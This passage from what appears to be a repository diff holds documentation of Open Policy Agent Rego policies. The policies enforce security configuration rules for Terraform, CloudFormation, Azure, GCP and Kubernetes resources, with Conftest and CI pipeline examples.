resource.type == "aws_instance"
not resource.change.after.metadata_options.http_tokens == "required"
msg := sprintf("EC2 instance must use IMDSv2: %v", [resource.name])
}
# Deny instances with public IPs in production
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_instance"
resource.change.after.associate_public_ip_address == true
is_production_environment
msg := sprintf("Production EC2 instances cannot have public IPs: %v", [resource.name])
}
# Require monitoring
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_instance"
resource.change.after.monitoring != true
msg := sprintf("EC2 instance must have detailed monitoring enabled: %v", [resource.name])
}
is_production_environment {
input.variables.environment == "production"
}
```
### RDS Database Security
```rego
package terraform.aws.rds
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
not resource.change.after.storage_encrypted
msg := sprintf("RDS instance must have encryption enabled: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
resource.change.after.publicly_accessible == true
msg := sprintf("RDS instance cannot be publicly accessible: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
not resource.change.after.backup_retention_period
msg := sprintf("RDS instance must have backup retention configured: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_db_instance"
resource.change.after.backup_retention_period < 7
msg := sprintf("RDS instance must have at least 7 days backup retention: %v", [resource.name])
}
```
### IAM Policy Security
```rego
package terraform.aws.iam
# Deny wildcard actions in IAM policies
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_iam_policy"
statement := resource.change.after.policy.Statement[_]
statement.Action[_] == "*"
msg := sprintf("IAM policy cannot use wildcard actions: %v", [resource.name])
}
# Deny wildcard resources
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_iam_policy"
statement := resource.change.after.policy.Statement[_]
statement.Resource[_] == "*"
statement.Effect == "Allow"
msg := sprintf("IAM policy cannot use wildcard resources with Allow: %v", [resource.name])
}
# Deny policies without conditions for sensitive actions
sensitive_actions := [
"iam:CreateUser",
"iam:DeleteUser",
"iam:AttachUserPolicy",
"kms:Decrypt",
]
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_iam_policy"
statement := resource.change.after.policy.Statement[_]
action := statement.Action[_]
sensitive_actions[_] == action
not statement.Condition
msg := sprintf("Sensitive IAM action requires conditions: %v in %v", [action, resource.name])
}
```
### Security Group Rules
```rego
package terraform.aws.security_groups
# Deny SSH from internet
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_security_group_rule"
resource.change.after.type == "ingress"
resource.change.after.from_port == 22
resource.change.after.to_port == 22
is_open_to_internet(resource.change.after.cidr_blocks)
msg := sprintf("Security group rule allows SSH from internet: %v", [resource.name])
}
# Deny RDP from internet
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_security_group_rule"
resource.change.after.type == "ingress"
resource.change.after.from_port == 3389
resource.change.after.to_port == 3389
is_open_to_internet(resource.change.after.cidr_blocks)
msg := sprintf("Security group rule allows RDP from internet: %v", [resource.name])
}
# Deny unrestricted ingress
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_security_group_rule"
resource.change.after.type == "ingress"
is_open_to_internet(resource.change.after.cidr_blocks)
not is_allowed_public_port(resource.change.after.from_port)
msg := sprintf("Security group rule allows unrestricted ingress: %v", [resource.name])
}
is_open_to_internet(cidr_blocks) {
cidr_blocks[_] == "0.0.0.0/0"
}
# Allowed public ports (HTTP/HTTPS)
is_allowed_public_port(port) {
port == 80
}
is_allowed_public_port(port) {
port == 443
}
```
### KMS Key Security
```rego
package terraform.aws.kms
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_kms_key"
not resource.change.after.enable_key_rotation
msg := sprintf("KMS key must have automatic rotation enabled: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_kms_key"
not resource.change.after.deletion_window_in_days
msg := sprintf("KMS key must have deletion window configured: %v", [resource.name])
}
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_kms_key"
resource.change.after.deletion_window_in_days < 30
msg := sprintf("KMS key deletion window must be at least 30 days: %v", [resource.name])
}
```
### CloudWatch Logging
```rego
package terraform.aws.logging
# Require CloudWatch logs for Lambda
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_lambda_function"
not has_cloudwatch_logs(resource.name)
msg := sprintf("Lambda function must have CloudWatch logs configured: %v", [resource.name])
}
has_cloudwatch_logs(function_name) {
resource := input.resource_changes[_]
resource.type == "aws_cloudwatch_log_group"
contains(resource.change.after.name, function_name)
}
```
## AWS CloudFormation
### S3 Bucket Security
```rego
package cloudformation.aws.s3
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::S3::Bucket"
not has_bucket_encryption(resource)
msg := sprintf("S3 bucket must have encryption: %v", [name])
}
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::S3::Bucket"
not has_versioning(resource)
msg := sprintf("S3 bucket must have versioning enabled: %v", [name])
}
has_bucket_encryption(resource) {
resource.Properties.BucketEncryption
}
has_versioning(resource) {
resource.Properties.VersioningConfiguration.Status == "Enabled"
}
```
### EC2 Security Groups
```rego
package cloudformation.aws.ec2
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::EC2::SecurityGroup"
rule := resource.Properties.SecurityGroupIngress[_]
rule.CidrIp == "0.0.0.0/0"
rule.FromPort == 22
msg := sprintf("Security group allows SSH from internet: %v", [name])
}
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::EC2::SecurityGroup"
rule := resource.Properties.SecurityGroupIngress[_]
rule.CidrIp == "0.0.0.0/0"
rule.FromPort == 3389
msg := sprintf("Security group allows RDP from internet: %v", [name])
}
```
### RDS Database
```rego
package cloudformation.aws.rds
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::RDS::DBInstance"
not resource.Properties.StorageEncrypted
msg := sprintf("RDS instance must have encryption enabled: %v", [name])
}
deny[msg] {
resource := input.Resources[name]
resource.Type == "AWS::RDS::DBInstance"
resource.Properties.PubliclyAccessible == true
msg := sprintf("RDS instance cannot be publicly accessible: %v", [name])
}
```
## Azure ARM Templates
### Storage Account Security
```rego
package azure.storage
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Storage/storageAccounts"
not resource.properties.supportsHttpsTrafficOnly
msg := sprintf("Storage account must require HTTPS: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Storage/storageAccounts"
resource.properties.allowBlobPublicAccess == true
msg := sprintf("Storage account must disable public blob access: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Storage/storageAccounts"
not resource.properties.minimumTlsVersion == "TLS1_2"
msg := sprintf("Storage account must use TLS 1.2 minimum: %v", [resource.name])
}
```
### Virtual Machine Security
```rego
package azure.compute
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Compute/virtualMachines"
not has_managed_identity(resource)
msg := sprintf("Virtual machine should use managed identity: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Compute/virtualMachines"
not has_disk_encryption(resource)
msg := sprintf("Virtual machine must have disk encryption: %v", [resource.name])
}
has_managed_identity(vm) {
vm.identity.type
}
has_disk_encryption(vm) {
vm.properties.storageProfile.osDisk.encryptionSettings
}
```
### Network Security Groups
```rego
package azure.network
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Network/networkSecurityGroups"
rule := resource.properties.securityRules[_]
rule.properties.access == "Allow"
rule.properties.sourceAddressPrefix == "*"
rule.properties.destinationPortRange == "22"
msg := sprintf("NSG allows SSH from internet: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "Microsoft.Network/networkSecurityGroups"
rule := resource.properties.securityRules[_]
rule.properties.access == "Allow"
rule.properties.sourceAddressPrefix == "*"
rule.properties.destinationPortRange == "3389"
msg := sprintf("NSG allows RDP from internet: %v", [resource.name])
}
```
## GCP Deployment Manager
### GCS Bucket Security
```rego
package gcp.storage
deny[msg] {
resource := input.resources[_]
resource.type == "storage.v1.bucket"
not has_uniform_access(resource)
msg := sprintf("GCS bucket must use uniform bucket-level access: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "storage.v1.bucket"
not has_encryption(resource)
msg := sprintf("GCS bucket must have encryption configured: %v", [resource.name])
}
has_uniform_access(bucket) {
bucket.properties.iamConfiguration.uniformBucketLevelAccess.enabled == true
}
has_encryption(bucket) {
bucket.properties.encryption
}
```
### Compute Instance Security
```rego
package gcp.compute
deny[msg] {
resource := input.resources[_]
resource.type == "compute.v1.instance"
not has_service_account(resource)
msg := sprintf("Compute instance should use service account: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "compute.v1.instance"
not has_disk_encryption(resource)
msg := sprintf("Compute instance must have disk encryption: %v", [resource.name])
}
has_service_account(instance) {
instance.properties.serviceAccounts
}
has_disk_encryption(instance) {
instance.properties.disks[_].diskEncryptionKey
}
```
### Firewall Rules
```rego
package gcp.network
deny[msg] {
resource := input.resources[_]
resource.type == "compute.v1.firewall"
resource.properties.direction == "INGRESS"
"0.0.0.0/0" == resource.properties.sourceRanges[_]
allowed := resource.properties.allowed[_]
allowed.ports[_] == "22"
msg := sprintf("Firewall rule allows SSH from internet: %v", [resource.name])
}
deny[msg] {
resource := input.resources[_]
resource.type == "compute.v1.firewall"
resource.properties.direction == "INGRESS"
"0.0.0.0/0" == resource.properties.sourceRanges[_]
allowed := resource.properties.allowed[_]
allowed.ports[_] == "3389"
msg := sprintf("Firewall rule allows RDP from internet: %v", [resource.name])
}
```
## Conftest Integration
Example using Conftest for Terraform validation:
```bash
# Install conftest
brew install conftest
# Create policy directory
mkdir -p policy
# Write policy (policy/terraform.rego)
package main
deny[msg] {
resource := input.resource_changes[_]
resource.type == "aws_s3_bucket"
not resource.change.after.server_side_encryption_configuration
msg := sprintf("S3 bucket must have encryption: %v", [resource.name])
}
# Generate Terraform plan
terraform plan -out=tfplan.binary
terraform show -json tfplan.binary > tfplan.json
# Run conftest
conftest test tfplan.json
```
## CI/CD Integration
### GitHub Actions
```yaml
name: IaC Policy Validation
on: [push, pull_request]
jobs:
validate:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Setup OPA
uses: open-policy-agent/setup-opa@v2
- name: Generate Terraform Plan
run: |
terraform init
terraform plan -out=tfplan.binary
terraform show -json tfplan.binary > tfplan.json
- name: Validate with OPA
run: |
opa eval --data policies/ --input tfplan.json \
--format pretty 'data.terraform.deny' > violations.txt
if [ -s violations.txt ]; then
cat violations.txt
exit 1
fi
```
### GitLab CI
```yaml
iac-validation:
image: openpolicyagent/opa:latest
script:
- terraform init
- terraform plan -out=tfplan.binary
- terraform show -json tfplan.binary > tfplan.json
- opa eval --data policies/ --input tfplan.json 'data.terraform.deny'
only:
- merge_requests
```
## References
- [Conftest](https://www.conftest.dev/)
- [Terraform Sentinel](https://www.terraform.io/docs/cloud/sentinel/index.html)
- [AWS CloudFormation Guard](https://github.com/aws-cloudformation/cloudformation-guard)
- [Azure Policy](https://docs.microsoft.com/en-us/azure/governance/policy/)
- [Checkov](https://www.checkov.io/)

View File

@@ -0,0 +1,550 @@
# Kubernetes Security Policies
Comprehensive OPA policies for Kubernetes security best practices and admission control.
## Table of Contents
- [Pod Security](#pod-security)
- [RBAC Security](#rbac-security)
- [Network Security](#network-security)
- [Image Security](#image-security)
- [Secret Management](#secret-management)
## Pod Security
### Privileged Containers
Deny privileged containers:
```rego
package kubernetes.admission.privileged_containers
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
container.securityContext.privileged == true
msg := sprintf("Privileged container is not allowed: %v", [container.name])
}
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.initContainers[_]
container.securityContext.privileged == true
msg := sprintf("Privileged init container is not allowed: %v", [container.name])
}
```
### Run as Non-Root
Enforce containers run as non-root:
```rego
package kubernetes.admission.non_root
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not container.securityContext.runAsNonRoot
msg := sprintf("Container must run as non-root user: %v", [container.name])
}
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
container.securityContext.runAsUser == 0
msg := sprintf("Container cannot run as UID 0 (root): %v", [container.name])
}
```
### Read-Only Root Filesystem
Require read-only root filesystem:
```rego
package kubernetes.admission.readonly_root
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not container.securityContext.readOnlyRootFilesystem
msg := sprintf("Container must use read-only root filesystem: %v", [container.name])
}
```
### Capabilities
Restrict Linux capabilities:
```rego
package kubernetes.admission.capabilities
# Denied capabilities
denied_capabilities := [
"CAP_SYS_ADMIN",
"CAP_NET_ADMIN",
"CAP_SYS_PTRACE",
"CAP_SYS_MODULE",
]
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
capability := container.securityContext.capabilities.add[_]
denied_capabilities[_] == capability
msg := sprintf("Capability %v is not allowed for container: %v", [capability, container.name])
}
# Require dropping ALL capabilities by default
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not drops_all_capabilities(container)
msg := sprintf("Container must drop ALL capabilities: %v", [container.name])
}
drops_all_capabilities(container) {
container.securityContext.capabilities.drop[_] == "ALL"
}
```
### Host Namespaces
Prevent use of host namespaces:
```rego
package kubernetes.admission.host_namespaces
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostPID == true
msg := "Sharing the host PID namespace is not allowed"
}
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostIPC == true
msg := "Sharing the host IPC namespace is not allowed"
}
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.hostNetwork == true
msg := "Sharing the host network namespace is not allowed"
}
```
### Host Paths
Restrict hostPath volumes:
```rego
package kubernetes.admission.host_path
# Allowed host paths (if any)
allowed_host_paths := [
"/var/log/pods", # Example: log collection
]
deny[msg] {
input.request.kind.kind == "Pod"
volume := input.request.object.spec.volumes[_]
volume.hostPath
not is_allowed_host_path(volume.hostPath.path)
msg := sprintf("hostPath volume is not allowed: %v", [volume.hostPath.path])
}
is_allowed_host_path(path) {
allowed_host_paths[_] == path
}
```
### Security Context
Comprehensive pod security context validation:
```rego
package kubernetes.admission.security_context
deny[msg] {
input.request.kind.kind == "Pod"
not input.request.object.spec.securityContext
msg := "Pod must define a security context"
}
deny[msg] {
input.request.kind.kind == "Pod"
pod_security := input.request.object.spec.securityContext
not pod_security.runAsNonRoot
msg := "Pod security context must set runAsNonRoot: true"
}
deny[msg] {
input.request.kind.kind == "Pod"
pod_security := input.request.object.spec.securityContext
not pod_security.seccompProfile
msg := "Pod must define a seccomp profile"
}
```
## RBAC Security
### Wildcard Permissions
Prevent wildcard RBAC permissions:
```rego
package kubernetes.rbac.wildcards
deny[msg] {
input.request.kind.kind == "Role"
rule := input.request.object.rules[_]
rule.verbs[_] == "*"
msg := sprintf("Role contains wildcard verb permission in rule: %v", [rule])
}
deny[msg] {
input.request.kind.kind == "Role"
rule := input.request.object.rules[_]
rule.resources[_] == "*"
msg := sprintf("Role contains wildcard resource permission in rule: %v", [rule])
}
deny[msg] {
input.request.kind.kind == "ClusterRole"
rule := input.request.object.rules[_]
rule.verbs[_] == "*"
msg := sprintf("ClusterRole contains wildcard verb permission in rule: %v", [rule])
}
```
### Cluster Admin
Restrict cluster-admin usage:
```rego
package kubernetes.rbac.cluster_admin
# System accounts allowed to use cluster-admin
allowed_system_accounts := [
"system:kube-controller-manager",
"system:kube-scheduler",
]
deny[msg] {
input.request.kind.kind == "ClusterRoleBinding"
input.request.object.roleRef.name == "cluster-admin"
subject := input.request.object.subjects[_]
not is_allowed_system_account(subject)
msg := sprintf("cluster-admin binding not allowed for subject: %v", [subject.name])
}
is_allowed_system_account(subject) {
allowed_system_accounts[_] == subject.name
}
```
### Service Account Token Mounting
Control service account token auto-mounting:
```rego
package kubernetes.rbac.service_account_tokens
deny[msg] {
input.request.kind.kind == "Pod"
input.request.object.spec.automountServiceAccountToken == true
not requires_service_account(input.request.object)
msg := "Pod should not auto-mount service account token unless required"
}
requires_service_account(pod) {
pod.metadata.annotations["requires-service-account"] == "true"
}
```
## Network Security
### Network Policies Required
Require network policies for namespaces:
```rego
package kubernetes.network.policies_required
# Check if namespace has network policies (requires admission controller data)
deny[msg] {
input.request.kind.kind == "Namespace"
not has_network_policy_annotation(input.request.object)
msg := sprintf("Namespace must have network policy annotation: %v", [input.request.object.metadata.name])
}
has_network_policy_annotation(namespace) {
namespace.metadata.annotations["network-policy.enabled"] == "true"
}
```
### Deny Default Network Policy
Implement default-deny network policy:
```rego
package kubernetes.network.default_deny
deny[msg] {
input.request.kind.kind == "NetworkPolicy"
not is_default_deny(input.request.object)
input.request.object.metadata.labels["policy-type"] == "default"
msg := "Default network policy must be deny-all"
}
is_default_deny(network_policy) {
# Check for empty ingress rules (deny all ingress)
not network_policy.spec.ingress
# Check for ingress type
network_policy.spec.policyTypes[_] == "Ingress"
}
```
### Service Type LoadBalancer
Restrict external LoadBalancer services:
```rego
package kubernetes.network.loadbalancer
deny[msg] {
input.request.kind.kind == "Service"
input.request.object.spec.type == "LoadBalancer"
not is_approved_for_external_exposure(input.request.object)
msg := sprintf("LoadBalancer service requires approval annotation: %v", [input.request.object.metadata.name])
}
is_approved_for_external_exposure(service) {
service.metadata.annotations["external-exposure.approved"] == "true"
}
```
## Image Security
### Image Registry Whitelist
Allow only approved image registries:
```rego
package kubernetes.images.registry_whitelist
approved_registries := [
"gcr.io/my-company",
"docker.io/my-company",
"quay.io/my-company",
]
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not is_approved_registry(container.image)
msg := sprintf("Image from unapproved registry: %v", [container.image])
}
is_approved_registry(image) {
startswith(image, approved_registries[_])
}
```
### Image Tags
Prevent latest tag and require specific tags:
```rego
package kubernetes.images.tags
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
endswith(container.image, ":latest")
msg := sprintf("Container uses 'latest' tag: %v", [container.name])
}
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
not contains(container.image, ":")
msg := sprintf("Container image must specify a tag: %v", [container.name])
}
```
### Image Vulnerability Scanning
Require vulnerability scan results:
```rego
package kubernetes.images.vulnerability_scanning
deny[msg] {
input.request.kind.kind == "Pod"
not has_scan_annotation(input.request.object)
msg := "Pod must have vulnerability scan results annotation"
}
deny[msg] {
input.request.kind.kind == "Pod"
scan_result := input.request.object.metadata.annotations["vulnerability-scan.result"]
scan_result == "failed"
msg := "Pod image failed vulnerability scan"
}
has_scan_annotation(pod) {
pod.metadata.annotations["vulnerability-scan.result"]
}
```
## Secret Management
### Environment Variable Secrets
Prevent secrets in environment variables:
```rego
package kubernetes.secrets.env_vars
sensitive_keywords := [
"password",
"token",
"apikey",
"secret",
"credential",
]
deny[msg] {
input.request.kind.kind == "Pod"
container := input.request.object.spec.containers[_]
env := container.env[_]
is_sensitive_name(env.name)
env.value # Direct value, not from secret
msg := sprintf("Sensitive data in environment variable: %v in container %v", [env.name, container.name])
}
is_sensitive_name(name) {
lower_name := lower(name)
contains(lower_name, sensitive_keywords[_])
}
```
### Secret Volume Permissions
Restrict secret volume mount permissions:
```rego
package kubernetes.secrets.volume_permissions
deny[msg] {
input.request.kind.kind == "Pod"
volume := input.request.object.spec.volumes[_]
volume.secret
volume_mount := input.request.object.spec.containers[_].volumeMounts[_]
volume_mount.name == volume.name
not volume_mount.readOnly
msg := sprintf("Secret volume mount must be read-only: %v", [volume.name])
}
```
### External Secrets
Require use of external secret management:
```rego
package kubernetes.secrets.external
deny[msg] {
input.request.kind.kind == "Secret"
input.request.object.metadata.labels["environment"] == "production"
not input.request.object.metadata.annotations["external-secret.enabled"] == "true"
msg := sprintf("Production secrets must use external secret management: %v", [input.request.object.metadata.name])
}
```
## Admission Control Integration
Example OPA Gatekeeper ConstraintTemplate:
```yaml
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
name: k8spodsecsecurity
spec:
crd:
spec:
names:
kind: K8sPodSecSecurity
targets:
- target: admission.k8s.gatekeeper.sh
rego: |
package k8spodsecurity
violation[{"msg": msg}] {
container := input.review.object.spec.containers[_]
container.securityContext.privileged == true
msg := sprintf("Privileged container not allowed: %v", [container.name])
}
violation[{"msg": msg}] {
container := input.review.object.spec.containers[_]
not container.securityContext.runAsNonRoot
msg := sprintf("Container must run as non-root: %v", [container.name])
}
```
Example Constraint:
```yaml
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPodSecSecurity
metadata:
name: pod-security-policy
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
namespaces:
- "production"
- "staging"
```
## References
- [Kubernetes Pod Security Standards](https://kubernetes.io/docs/concepts/security/pod-security-standards/)
- [OPA Gatekeeper Library](https://github.com/open-policy-agent/gatekeeper-library)
- [NSA Kubernetes Hardening Guide](https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/2716980/)
- [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes)

Some files were not shown because too many files have changed in this diff Show More